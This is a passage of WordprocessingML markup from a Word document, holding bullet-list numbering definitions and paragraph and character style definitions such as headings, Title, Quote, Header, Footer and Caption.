    <w:lvl w:ilvl="4">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="3589"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="4309"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="5029"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="5749"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="6469"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="15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5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5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5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5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6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6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6">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6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6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7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7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7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75">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76">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7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7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7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8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8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83">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4">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8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8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88">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8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9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9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93">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19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95">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9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19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19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0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0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0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07">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8">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0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1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18">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1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2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2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2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2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29">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0">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1">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7">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8">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39">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4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41">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42">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4">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45">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46">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47">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48">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49">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50">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51">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52">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53">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54">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abstractNum w:abstractNumId="255">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56">
    <w:lvl w:ilvl="0">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="709"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="1429"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="2149"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="2869"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="3589"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="4309"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="5029"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="5749"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="6469"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="257">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58">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59">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6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61">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62">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63">
    <w:lvl w:ilvl="0">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="709"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="1429"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="2149"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="2869"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="3589"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="4309"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="5029"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="5749"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="6469"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="264">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265">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
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="1429"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="2149"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>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
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="3589"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="4309"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>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
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="5749"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
      </w:rPr>
      <w:start w:val="1"/>
      <w:suff w:val="tab"/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:isLgl w:val="false"/>
      <w:lvlJc w:val="left"/>
      <w:lvlText w:val="·"/>
      <w:numFmt w:val="bullet"/>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:hanging="360" w:left="6469"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>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61"/>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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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11">
    <w:name w:val="List Table 7 Colorful - Accent 2"/>
    <w:basedOn w:val="66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12">
    <w:name w:val="List Table 7 Colorful - Accent 3"/>
    <w:basedOn w:val="66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13">
    <w:name w:val="List Table 7 Colorful - Accent 4"/>
    <w:basedOn w:val="66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14">
    <w:name w:val="List Table 7 Colorful - Accent 5"/>
    <w:basedOn w:val="66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15">
    <w:name w:val="List Table 7 Colorful - Accent 6"/>
    <w:basedOn w:val="66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16">
    <w:name w:val="Lined - Accent"/>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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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60"/>
    <w:next w:val="660"/>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60"/>
    <w:next w:val="660"/>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60"/>
    <w:next w:val="660"/>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60"/>
    <w:next w:val="660"/>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60"/>
    <w:next w:val="660"/>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60"/>
    <w:next w:val="660"/>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60"/>
    <w:next w:val="660"/>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60"/>
    <w:next w:val="660"/>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60"/>
    <w:next w:val="660"/>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7" w:default="1">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="149">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="147"/>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147"/>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147"/>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147"/>
    <w:link w:val="141"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="153">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="147"/>
    <w:link w:val="142"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="154">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="147"/>
    <w:link w:val="143"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="155">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="147"/>
    <w:link w:val="144"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="156">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="147"/>
    <w:link w:val="145"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="157">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="147"/>
    <w:link w:val="146"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="158">
    <w:name w:val="Title"/>
    <w:basedOn w:val="660"/>
    <w:next w:val="660"/>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147"/>
    <w:link w:val="158"/>
    <w:uiPriority w:val="10"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:spacing w:val="-10"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="160">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="660"/>
    <w:next w:val="660"/>
    <w:link w:val="161"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="161">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="147"/>
    <w:link w:val="160"/>
    <w:uiPriority w:val="11"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="162">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="660"/>
    <w:next w:val="660"/>
    <w:link w:val="163"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:before="160"/>
      <w:ind/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="163">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="147"/>
    <w:link w:val="162"/>
    <w:uiPriority w:val="29"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="165">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="147"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="166">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="660"/>
    <w:next w:val="660"/>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147"/>
    <w:link w:val="166"/>
    <w:uiPriority w:val="30"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="168">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="147"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="170">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="147"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="171">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="147"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="172">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="147"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="173">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="147"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="5a5a5a" w:themeColor="text1" w:themeTint="A5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="174">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="147"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="175">
    <w:name w:val="Header"/>
    <w:basedOn w:val="660"/>
    <w:link w:val="176"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:tabs>
        <w:tab w:val="center" w:leader="none" w:pos="4844"/>
        <w:tab w:val="right" w:leader="none" w:pos="9689"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="176">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="147"/>
    <w:link w:val="175"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="177">
    <w:name w:val="Footer"/>
    <w:basedOn w:val="660"/>
    <w:link w:val="178"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:tabs>
        <w:tab w:val="center" w:leader="none" w:pos="4844"/>
        <w:tab w:val="right" w:leader="none" w:pos="9689"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="178">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="147"/>
    <w:link w:val="177"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="179">
    <w:name w:val="Caption"/>
    <w:basedOn w:val="660"/>
    <w:next w:val="660"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0e2841" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="180">
    <w:name w:val="footnote text"/>
